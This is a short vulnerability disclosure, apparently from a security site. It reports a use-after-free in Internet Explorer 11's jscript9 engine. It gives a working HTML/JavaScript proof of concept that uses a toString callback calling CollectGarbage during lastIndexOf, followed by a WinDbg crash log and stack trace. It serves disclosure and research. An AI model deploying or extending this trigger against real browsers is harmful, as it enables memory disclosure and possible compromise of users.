There is a Use-after-free vulnerability in Internet Explorer that could potentially be used for memory disclosure.
This was tested on IE11 running on Window 7 64-bit with the latest patches applied.
PoC:
```
<!-- saved from url=(0014)about:internet -->
<script>
var vars = new Array(2);
function main() {
vars[0] = new Array(1000000);
vars[1] = String.prototype.substr.call(vars[0], 100);
var o = {}; o.toString = f8;
String.prototype.lastIndexOf.call(vars[1], "a", o);
}
function f8(arg7, arg8, arg9) {
alert(vars[1]);
CollectGarbage();
}
main();
</script>
```
Debug log:
```
(abc.db8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000061 ebx=09929e60 ecx=0ea5848c edx=09555230 esi=0e8700d8 edi=000f41db
eip=6cd18341 esp=0a0cb330 ebp=0a0cb588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
jscript9!Js::JavascriptString::EntryLastIndexOf+0x15d:
6cd18341 663901 cmp word ptr [ecx],ax ds:002b:0ea5848c=????
0:008> k
# ChildEBP RetAddr
00 0a0cb588 6cbe6a49 jscript9!Js::JavascriptString::EntryLastIndexOf+0x15d
01 0a0cb5d4 6cc74ad1 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
02 0a0cb5f8 6cbf12fb jscript9!Js::JavascriptFunction::EntryCall+0x95
03 0a0cb808 6cbf1689 jscript9!Js::InterpreterStackFrame::Process+0xc6d
04 0a0cb93c 0b5c0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
WARNING: Frame IP not in any known module. Following frames may be wrong.
05 0a0cb948 6cbf12fb 0xb5c0fe1
06 0a0cbb48 6cbf1689 jscript9!Js::InterpreterStackFrame::Process+0xc6d
07 0a0cbc64 0b5c0fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
08 0a0cbc70 6cbe6a49 0xb5c0fe9
09 0a0cbcb4 6cbe6f78 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
0a 0a0cbd28 6cbe6ead jscript9!Js::JavascriptFunction::CallRootFunction+0xb5
0b 0a0cbd70 6cbe6e40 jscript9!ScriptSite::CallRootFunction+0x42
0c 0a0cbdbc 6ccf45cf jscript9!ScriptSite::Execute+0xd2
0d 0a0cbe44 6ccf38ee jscript9!ScriptEngine::ExecutePendingScripts+0x1c6
0e 0a0cbed8 6ccf4e0a jscript9!ScriptEngine::ParseScriptTextCore+0x300
0f 0a0cbf28 6dea5fd8 jscript9!ScriptEngine::ParseScriptText+0x5a
10 0a0cbf60 6db53f88 MSHTML!CActiveScriptHolder::ParseScriptText+0x51
11 0a0cbfb8 6de4c88f MSHTML!CJScript9Holder::ParseScriptText+0x5f
12 0a0cc028 6db542a7 MSHTML!CScriptCollection::ParseScriptText+0x175
13 0a0cc114 6db5495d MSHTML!CScriptData::CommitCode+0x31e
14 0a0cc194 6db552ac MSHTML!CScriptData::Execute+0x232
15 0a0cc1b4 6de7b156 MSHTML!CHtmScriptParseCtx::Execute+0xed
16 0a0cc208 6d89b11e MSHTML!CHtmParseBase::Execute+0x201
17 0a0cc224 6d89ab57 MSHTML!CHtmPost::Broadcast+0x182
18 0a0cc35c 6d92bc2d MSHTML!CHtmPost::Exec+0x617
19 0a0cc37c 6d92bb93 MSHTML!CHtmPost::Run+0x3d
1a 0a0cc398 6db19a4e MSHTML!PostManExecute+0x61
1b 0a0cc3ac 6db1a128 MSHTML!PostManResume+0x7b
1c 0a0cc3dc 6db0e272 MSHTML!CHtmPost::OnDwnChanCallback+0x38
1d 0a0cc3f4 6d7f604e MSHTML!CDwnChan::OnMethodCall+0x2f
1e 0a0cc444 6d7f5b9a MSHTML!GlobalWndOnMethodCall+0x16c
1f 0a0cc498 74ed62fa MSHTML!GlobalWndProc+0x103
20 0a0cc4c4 74ed6d3a user32!InternalCallWinProc+0x23
21 0a0cc53c 74ed77c4 user32!UserCallWinProcCheckWow+0x109
22 0a0cc59c 74ed788a user32!DispatchMessageWorker+0x3b5
23 0a0cc5ac 6ed9abdc user32!DispatchMessageW+0xf
24 0a0cf778 6edcecb8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
25 0a0cf838 76c8971c IEFRAME!LCIETab_ThreadProc+0x3e7
26 0a0cf850 74493a31 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
27 0a0cf888 7507336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
28 0a0cf894 775698f2 kernel32!BaseThreadInitThunk+0xe
29 0a0cf8d4 775698c5 ntdll!__RtlUserThreadStart+0x70
2a 0a0cf8ec 00000000 ntdll!_RtlUserThreadStart+0x1b
0:008> r
eax=00000061 ebx=09929e60 ecx=0ea5848c edx=09555230 esi=0e8700d8 edi=000f41db
eip=6cd18341 esp=0a0cb330 ebp=0a0cb588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
jscript9!Js::JavascriptString::EntryLastIndexOf+0x15d:
6cd18341 663901 cmp word ptr [ecx],ax ds:002b:0ea5848c=????
```
暂无评论